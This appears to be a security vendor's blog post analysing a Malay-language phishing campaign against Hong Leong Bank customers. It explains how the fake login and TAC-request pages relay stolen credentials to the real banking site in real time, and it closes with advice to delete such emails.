Malaysian Phishing in real-time

Since several weeks we see a higher amount of spam/phish Emails in Malaysia.

Recently, our Virus Lab in Malaysia came across phishing mails in the Malay language impersonating the Hong Leong bank. Even if this phishing attack has only a local impact, it showed us how the phishers learnt to integrate with the attacked bank in real-time in order to make their transactions even more realistic to the user.

The email requests to confirm the account data due to a data base update. For this, the recipient of the email should open the attached update HTML form .

Background for this story is the recent take over from the EON bank group by Hong Leong bank, earlier this year.

The attached “update form” opens up a local, faked Hong Leong login page:

After entering user name and password the user will be forwarded to another fake verification-in-progress page.

In the meantime the phishers use the entered login credentials on the real Hong Leong onlinebanking site to trigger the bank to send the victim a SMS with a TAC (TransActionCode), same as the usual mTAN in Europe and the US.


This process is very interesting and innovative because this phishing scam does everything in real-time and not offline, as usual. Until now, we only have seen these scams requesting  the user to submit some TAN/TAC numbers which the scammers would use later to make transactions on behalf of the user.

Last year, most banks around the world have changed from the usual TAN/TAC tables on paper to the more modern and secure mTAN (mobile TAN) which involves mobile phones in order to receive the TAN via SMS. This is a classical example of two-factor authentication, which we addressed already in several posts. A two-factor authentication mechanism requires two things in order to prove that it is indeed you:

– something the only you know (e.g.: username/password and a code like TAC/TAN)

– something that only you own (e.g.: mobile phone)

The next step is to get that sent TAC from the victim.

Therefore they set up a special page in order to request the TAC:

Right after this, the faked process ends with the following page, informing the user that everything went well:

The page mentions that the database is going to be updated in about 3 hours. This should be enough time for the Phishers to get your money, now that they know the login credentials as well as one TAC.

Our investigations point out that the sent TAC is valid only 1 hour after sending.

After a few seconds, the page will redirect to the official Hong Leong website in order to make the user feel confident that he didn’t do anything wrong.

We strongly advise our readers to not open such emails because a bank will never send such requests via email. Always erase the emails without opening any attachments or clicking any links.


Alexander Neth

Manager Virus Lab – Avira Malaysia

Sorin Mustaca

Data Security Expert